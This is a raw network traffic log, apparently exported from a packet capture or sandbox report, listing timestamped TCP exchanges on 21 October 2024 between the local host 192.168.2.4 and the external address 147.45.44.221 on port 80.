                                                                                                                                                    Oct 21, 2024 08:47:27.705178976 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.705193996 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.705203056 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.705226898 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.705230951 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.705259085 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.705272913 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.705332041 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.705339909 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.705363035 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.705374002 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.705403090 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.705404997 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.705441952 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.705450058 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.705483913 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.705490112 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.705514908 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.705526114 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.705548048 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.705557108 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.705579996 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.705590963 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.705625057 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.705651999 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.705683947 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.705694914 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.705715895 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.705725908 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.705748081 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.705759048 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.705790997 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.705796957 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.705825090 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.705838919 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.705866098 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.705873966 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.705916882 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.705923080 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.705954075 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.705964088 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.705985069 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.705996037 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.706016064 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.706027985 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.706047058 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.706049919 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.706078053 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.706088066 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.706110001 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.706120014 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.706140041 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.706156015 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.706172943 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.706198931 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.706203938 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.706222057 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.706235886 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.706260920 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.706269026 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.706285000 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.706301928 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.706309080 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.706335068 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.706343889 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.706367970 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.706382990 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.706401110 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.706410885 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.706434011 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.706446886 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.706465006 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.706475019 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.706501961 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.706506968 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.706531048 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.706547022 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.706568956 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.824599981 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.824630022 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.824666977 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.824683905 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.824704885 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.824722052 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.824742079 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.824758053 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.824805975 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.824831963 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.824839115 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.824870110 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.824873924 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.824894905 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.824902058 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.824912071 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.824939013 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.824954987 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.824985981 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.824999094 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.825027943 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.825037003 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.825082064 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.825102091 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.825140953 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.825148106 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.825180054 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.825190067 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.825212002 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.825223923 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.825246096 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.825253010 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.825277090 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.825287104 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.825319052 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.825330973 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.825357914 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.825373888 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.825390100 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.825397968 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.825422049 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.825432062 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.825453997 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.825465918 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.825486898 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.825496912 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.825519085 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.825537920 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.825551033 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.825556040 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.825583935 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.825594902 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.825615883 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.825627089 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.825648069 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.825661898 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.825694084 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.832336903 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.832367897 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.832402945 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.832402945 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.832418919 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.832448959 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.832458973 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.832482100 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.832513094 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.832514048 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.832521915 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.832545996 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.832555056 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.832596064 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.832601070 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.832628012 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.832640886 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.832659960 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.832670927 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.832707882 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.832709074 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.832736015 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.832751036 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.832778931 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.832782984 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.832818031 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.832834005 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.832863092 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.832865000 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.832896948 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.832906961 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.832930088 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.832941055 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.832962036 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.832972050 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.832993031 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.833003998 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.833024025 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.833033085 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.833055973 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.833067894 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.833086967 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.833093882 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.833117962 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.833128929 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.833149910 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.833162069 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.833182096 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.833194971 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.833220959 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.871032953 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.871067047 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.871098995 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.871099949 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.871130943 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.871140957 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.943933010 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.944003105 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.944005966 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.944056034 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.944071054 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.944117069 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.944123983 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.944169998 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.944190979 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.944222927 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.944233894 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.944263935 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.944267988 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.944314003 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.944314957 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.944359064 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.944364071 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.944391966 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.944408894 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.944437981 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.944439888 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.944483995 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.944489956 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.944519997 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.944530964 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.944571018 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.944571972 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.944600105 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.944614887 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.944681883 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.944686890 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.944732904 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.944734097 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.944766045 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.944777966 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.944797039 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.944811106 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.944847107 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.944854021 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.944876909 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.944909096 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.944909096 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.944940090 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.944940090 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.944957018 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.944972992 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.944988012 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.945003033 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.945013046 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.945034981 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.945048094 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.945066929 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.945076942 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.945099115 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.945112944 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.945130110 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.945143938 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.945163012 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.945175886 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.945194006 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.945205927 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.945226908 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.945240021 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.945259094 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.945281982 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.945296049 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.945306063 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.945327997 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.945343971 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.945358992 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.945365906 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.945394039 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.945421934 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.945425987 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.945442915 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.945456028 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.945471048 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.945496082 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.951697111 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.951788902 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.951793909 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.951838970 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.951843023 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.951889992 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.951890945 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.951921940 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.951936007 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.951955080 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.951961994 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.952002048 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.952006102 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.952050924 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.952053070 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.952080965 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.952097893 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.952111959 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.952124119 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.952157974 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.952161074 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.952193022 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.952208042 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.952224970 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.952239990 CEST4973280192.168.2.4147.45.44.221
